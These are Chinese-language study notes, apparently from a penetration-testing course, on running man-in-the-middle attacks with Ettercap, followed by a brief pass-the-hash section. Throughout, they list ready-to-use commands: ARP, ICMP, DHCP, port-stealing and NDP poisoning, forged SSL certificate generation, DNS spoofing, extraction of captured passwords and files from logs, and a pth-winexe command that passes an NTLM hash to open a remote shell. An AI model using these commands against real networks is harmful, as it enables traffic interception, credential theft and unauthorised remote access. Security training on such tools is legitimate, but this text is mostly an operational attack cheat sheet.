Ettercap

– 统一的中间人攻击工具
– 转发MAC与本机相同,但IP与本机不同的数据包
– 支持SSH1、SSL中间人攻击
模块划分
– Snifer
– MITM
– Filter
-Log
– Plugi

Snifer

  • 负责数据包转发
  • Unified 单网卡情况下独立完成三层包转发  始终禁用内核IP_Forward功能 – Bridge
  • 双网卡情况下的一层MITM模式 
  • 可作为IPS过滤数据包

  • 不可在网关上使用(透明网桥)

    MITM

    把流量重定向到ettercap主机上 – 可以使用其他工具实现MITM,ettercap之作嗅探和过滤使用
    实现MITM的方法
    – ARP
    – ICMP

  • ICMP路由重定向,半双工

    – DHCP
    修改网关地址,半双工 – Switch Port Stealing 

  • flood目标地址是本机,源地址是受害者的包

  • 适用于ARP静态绑定的环境

– NDP

  • IPv6协议欺骗技术

    用户操作界面

    – -T 文本界面
    – -G 图形界面
    – -C 基于文本的图形界面
    – -D 后台模式

  • 指定目标

    – IPv4:MAC/IPs/Ports
    – IPv6:MAC/IPs//IPv6/Ports
    – /10.0.0.1−5;10.0.1.33/20−25,80,110
    权限
    – 需要root权限打开链路层Socket连接,然后使用nobody账号运行
    – 日志写入目录需要nobody有写入权 – 修改etter.conf:EC_UID=65534
    基于伪造证书的SSL MITIM
    – Bridge模式不支持SSL MITM
    – openssl genrsa −out etter.ssl.crt 1024
    – openssl req −new−keyetter.ssl.crt −out tmp.csr
    – openssl x509 −req −days 1825 −in tmp.csr −signkey etter.ssl.crt −out tmp.new
    – cat tmp.new>>etter.ssl.crt
    – rm −f tmp.newtmp.csr
    字符模式
    – ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.2// -F 1.ef -P autoadd -w a.cap -l loginfo -L logall -m message
    ```bash -T —text 使用只显示字符的界面 -q, —quiet 安静模式,不显示抓到的数据包内容 -s, —script 向用户界面发出这些命令 -C, —curses 使用curses图形化界面 -G, —gtk 使用GTK+ GUI -D, —daemon 守护模式(无界面),相当于在后台运行 -L, —log 此处记录所有流量 -l, —log-info 此处记录所有信息 -W, —wep-key 使用该wep密钥解密wifi数据包 -M 执行中间人攻击 -m,—log-msg 只记录所有的消息信息

``` 图形界面
SSL MITM
– vi /etc/ettercap/etter.conf
DNS欺骗
– dns_spoof插件配置文件
– vi /etc/ettercap/etter.dns

Ettercap 日志查看

– etterlog -p log.eci 查看获取的密码
– etterlog -c log.ecp 列出Log中的连接
– etterlog -c -f /1.1.1.1/ log.ecp
– etterlog -B -n -s -F TCP:1.1.1.1:20:1.1.1.2:1234 log.ecp > aa 选择相应的连接并榨取文件
Filter
– /usr/share/ettercap/
SSH-2.xx / SSH-1.99 / SSH-1.51
– etterfilter etter.filter.ssh -o ssh.ef
ICMP
– -M icmp:00:11:22:33:44:55/10.0.0.1(真实网关的MAC/IP)
DHCP
– −M dhcp:192.168.0.30,35,50−60/255.255.255.0/192.168.0.1(DNS)
Port
– -M port /1.1.1.1/ /1.1.1.2/
Ndp
– -M ndp //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/

Pass the Hash (PTH)

密码破解耗费时间资源巨大
使用密文提交给服务器直接完成身份认证
NTLM/LM是没有加盐的静态HASH密文
企业中使用ghost等工具克隆安装系统
pth-winexe -U w7%aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063 716ab7fe2a11faf126d8 //1.1.1.1 cm